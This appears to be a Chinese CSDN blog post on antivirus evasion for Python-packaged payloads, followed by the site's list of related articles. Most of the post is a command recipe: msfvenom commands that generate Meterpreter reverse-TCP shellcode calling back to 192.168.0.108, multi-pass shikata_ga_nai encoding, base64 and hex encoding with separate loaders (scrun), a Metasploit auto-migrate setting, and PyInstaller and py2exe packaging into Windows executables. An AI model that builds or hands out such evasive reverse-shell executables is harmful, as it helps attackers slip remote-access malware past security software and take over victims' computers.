WEB渗透免杀篇-Python源码免杀

已于 2024-08-15 08:35:49 修改
阅读量320 收藏 4
点赞数 4
分类专栏: 渗透测试 文章标签: python WEB安全 WEB渗透 渗透测试 网络安全
于 2024-08-14 14:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141190253
版权

Base64编码+Pyinstaller打包

MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

Shellcode粘贴在shellcode+base64+c.py中

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载C代码编译

生成C格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f c -o /var/www/html/1.c

粘贴shellcode到shellcode+c.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py -F -w shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

pyinstaller加载py代码编译

生成py格式payload MSF监听需设置自动迁移进程

set autorunscript migrate -n explorer.exe
msfvenom -p windows/meterpreter/reverse_tcp LPORT=12138 LHOST=192.168.0.108 -e x86/shikata_ga_nai -i 11 -f py -o /var/www/html/1.py

粘贴shellcode到shellcode+py.py中,在32位系统上安装python、py2exe、pyinstaller进入C:\Python27\Scripts目录使用命令把py打包为exe

python pyinstaller-script.py --console --onefile shellcode.py

会在目录下生成dist文件夹,exe文件就在里面

image

image

image

Py2exe打包exe
生成raw格式payload
MSF监听需设置自动迁移进程set autorunscript migrate -n explorer.exe
>msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -f raw -o /var/www/html/shell.py
在32位系统上安装python、py2exe
创建setup.py放置同一目录

image

from distutils.core import setup
import py2exe
setup(
name = "Meter",
description = "Python-based App",
version = "1.0",
console = ["shell.py"],
options = {"py2exe":{"bundle_files":1,"packages":"ctypes","includes":"base64,sys,socket,struct,time,code,platform,getpass,shutil",}},
zipfile = None
)
执行打包命令
>python setup.py py2exe
会在当前目录生成dist文件夹,打包好的exe在里面

image

加载器分离

hex

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c

下载k8final

image

粘贴shellcode进去

image

使用

https://github.com/k8gege/scrun

image

或
>python scrun.py xxx
或
编译ScRunHex.py为exe
Base64( *)

生成c格式payload

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 6 -b '\x00' lhost=192.168.0.108 lport=12138 -f c -o /var/www/html/shell.c
下载k8final

image

粘贴shellcode进去

image

进行hex编码后,粘贴进去base64编码

image

看系统位数编译ScRunBase.py文件,使用pyinstaller打包为exe后执行

https://gitee.com/RichChigga/scrun/blob/master/ScRunBase64.py
>python pyinstaller-script.py -F -w ScRunBase64.py

image

image

Pluto-2003
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
一款基于Python-Django的多功能Web安全渗透测试工具源码.zip
05-08
这款基于Python-Django的Web安全渗透测试工具源码是一个强大的多用途平台,旨在帮助安全专家和开发者检测并解决Web应用程序的安全问题。它整合了多种功能,包括漏洞扫描、端口扫描、指纹识别、目录扫描、旁站扫描...
基于Python的Django-html的web渗透测试工具源码-说明文档
07-17
基于Python的Django-html的web渗透测试工具 项目关键技术 开发工具:Pycharm 编程语言: python 数据库: MySQL5.7+ 后端技术:Django 前端技术:HTML 关键技术:HTML、MYSQL、Python 数据库工具:Navicat、SQLyog
WEB渗透信息收集--网站架构和指纹识别
qq_59468567的博客
07-22 2617
信息泄露 电话、邮箱,姓名 若是论坛ID=1的用户名一般为管理、或查看帖子信息、生成字典 网页上客服的QQ(先判断是企业的还是个人,用处有时不太大,看怎么用,搞个鱼叉什么的) 目录遍历 dirsearch、御剑 备份文件 (www.zip,xx.com.zip,www.xx.com.zip,wwwroot.zip) .svn/.git/sql/robots/crossdomin.xml/DS_Store等
WEB渗透信息收集--域名信息
qq_59468567的博客
07-20 769
dns-brute-script - Nmap 将尝试通过暴力破解流行的子域名来枚举 DNS 主机名。#查询解析某域名的DNS服务器 nslookup #进入nslookup交互模式 server。#指定dns服务器 ls。单个域名>python3。多个域名>python3。
渗透免杀工具,原理及技巧
baimaozi008的博客
01-03 580
渗透测试中的免杀技术主要是指规避安全软件(如杀毒软件和入侵检测系统)检测的方法。这些技术通常用于合法的渗透测试,以评估安全系统对新型或变体攻击的防御能力。
安全研究】免杀对抗之源码免杀
weixin_46591320的博客
05-16 2648
0x01 免杀分类 渗透测试中常需要免杀马,这块的内容交叉且形式多样。常见的免杀方式,源码混淆、DLL文件替换、文件修改、加壳、花指令免杀、签名等。免杀的内容比较偏向破解、反编译范畴的安全研究,也是武器库中的必不可少的部分。本文章是系列教程,各种免杀方式都会涉及,本次分享的是源码免杀。 0x02 源码免杀 这里以Python免杀为例,其他语言如C#、GO、Ruby等免杀思路相同。 免杀的大致步骤可以分为如下,视情况可以采用部分步骤: 加载器选择-ctypes-DLL&其他,加载shellcode
Web应用渗透测试系统(Python
毕业作品网站
11-04 5399
本项目命名为Sec-Tools,是一款基于的多功能 Web 应用渗透测试系统,包含漏洞检测、目录识别、端口扫描、指纹识别、域名探测、旁站探测、信息泄露检测等功能。
CobaltStrike木马免杀代码python反序列化分离免杀(一)
xf555er的博客
11-21 1814
文章主要用到python来对CobaltStrike生成的Shellcode进行分离免杀处理, 因此要求读者要有一定的python基础, 下面我会介绍pyhon反序列化免杀所需用到的相关函数和库
渗透学习-CTF-web-BUUCTF
qq_43696276的博客
01-17 2177
随着学习的不断深入,为了防止自己忘记之前所学的内容,于是我决定再不断的向下学习的同时做一些ctf的题来唤醒自己的记忆!!
信息打点web----web后端源码专项收集
2302_79590880的博客
06-21 790
渗透前,打点获取源码的方法。
渗透测试-最全Web 渗透测试信息搜集-CheckList
lza20001103的博客
08-13 1310
渗透测试-干货 | 最全Web 渗透测试信息搜集-CheckList
python毕业设计之nweb渗透测试工具(django)源码.zip
07-14
Python毕业设计中的“nweb渗透测试工具”是一个基于Django框架开发的应用,旨在提供网络安全性评估的功能。这个项目的核心目标是教会学生如何利用Python和Django来构建一个实用的网络安全工具,同时也展示了Web安全...
毕业设计-基于python-web渗透测试工具(django)毕业设计与实现(源码+数据库+演示视频).zip
07-09
第2章 web安全评估及测试的介绍 8 2.1 渗透测试 8 2.2 web安全评估 8 第3章 渗透测试安全评估的设计 10 3.1 漏洞渗透测试方法设计 10 3.2 SQL漏洞的设计 10 3.2.1 SQL注入漏洞的原理 10 3.3.2SQL注入漏洞的危害 10...
GraphRAG:复杂查询的知识图谱新框架
YeJuliaLi的博客
08-14 452
微软最近发布了名为 GraphRAG(Graphs + Retrieval Augmented Generation)的创新 RAG 框架,这是一个将文本提取、语义网络分析,与大语言模型(LLM)的提示和总结功能结合在一起的端到端系统,用于深入理解文本数据集。在对私有数据中的复杂文本信息进行文档分析时,GrahRAG 使用 LLM 生成的知识图谱来大幅提高问答性能。这里的私有数据集是指 LLM 没...
Java读写EM4305卡、将4305卡制做成4100ID卡
zhangjin7422的专栏
08-14 310
Java读写em4305低频RFID源码,支持将EM4305卡配置成4100ID卡
importlib库介绍
m0_51579041的博客
08-14 153
importlib
SciPy:基于 NumPy 的算法库和数学工具包,用于数学、科学和工程领域。
LS_Ai的博客
08-15 594
无论是进行线性代数运算、优化问题求解、积分与微分方程处理,还是进行信号和图像处理,SciPy都提供了高度优化的工具,使得复杂的科学计算任务变得更加简单和高效。SciPy的目标是为用户提供一个全面的科学计算环境,其中涵盖了常见的线性代数、优化、积分、插值、傅里叶变换、信号处理、统计、图像处理、以及ODE(常微分方程)求解等功能。SciPy与NumPy紧密结合,同时也与Pandas、Matplotlib等库有很好的兼容性,这使得它在科学研究、数据分析和工程计算中占据了重要地位。
python学习之writelines
最新发布
li758568825的专栏
08-15 110
字符串列表。
Python渗透源码
05-01
Python渗透源码是指用Python语言编写的用于网络渗透测试安全评估的工具或脚本的源代码。Python渗透测试领域非常流行,因为它具有简洁、易读、易学的特点,并且有丰富的第三方库和模块支持。 以下是一些常见的Python渗透工具和库的介绍: 1. Scapy:Scapy是一个强大的网络数据包处理库,可以用于构建、发送和解析网络数据包。它可以用于网络扫描、嗅探、欺骗等多种渗透测试任务。 2. Metasploit Framework:Metasploit是一个广泛使用的渗透测试框架,它提供了一系列的模块和工具,用于发现、利用和验证系统中的安全漏洞。 3. Requests:Requests是一个简洁而强大的HTTP库,可以用于发送HTTP请求和处理响应。在渗透测试中,可以使用Requests库来进行Web应用程序的漏洞扫描和攻击。 4. Paramiko:Paramiko是一个用于SSH协议的Python实现,可以用于远程执行命令、文件传输等操作。在渗透测试中,Paramiko可以用于通过SSH协议进行远程主机的渗透。 5. BeautifulSoup:BeautifulSoup是一个用于解析HTML和XML文档的库,可以用于从Web页面中提取数据。在渗透测试中,可以使用BeautifulSoup来分析和提取目标网站的敏感信息。 以上只是一些常见的Python渗透工具和库的介绍,实际上还有很多其他的工具和库可供使用。如果你对某个具体的工具或库感兴趣,可以提供更具体的信息,我可以为你提供更详细的源码介绍。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值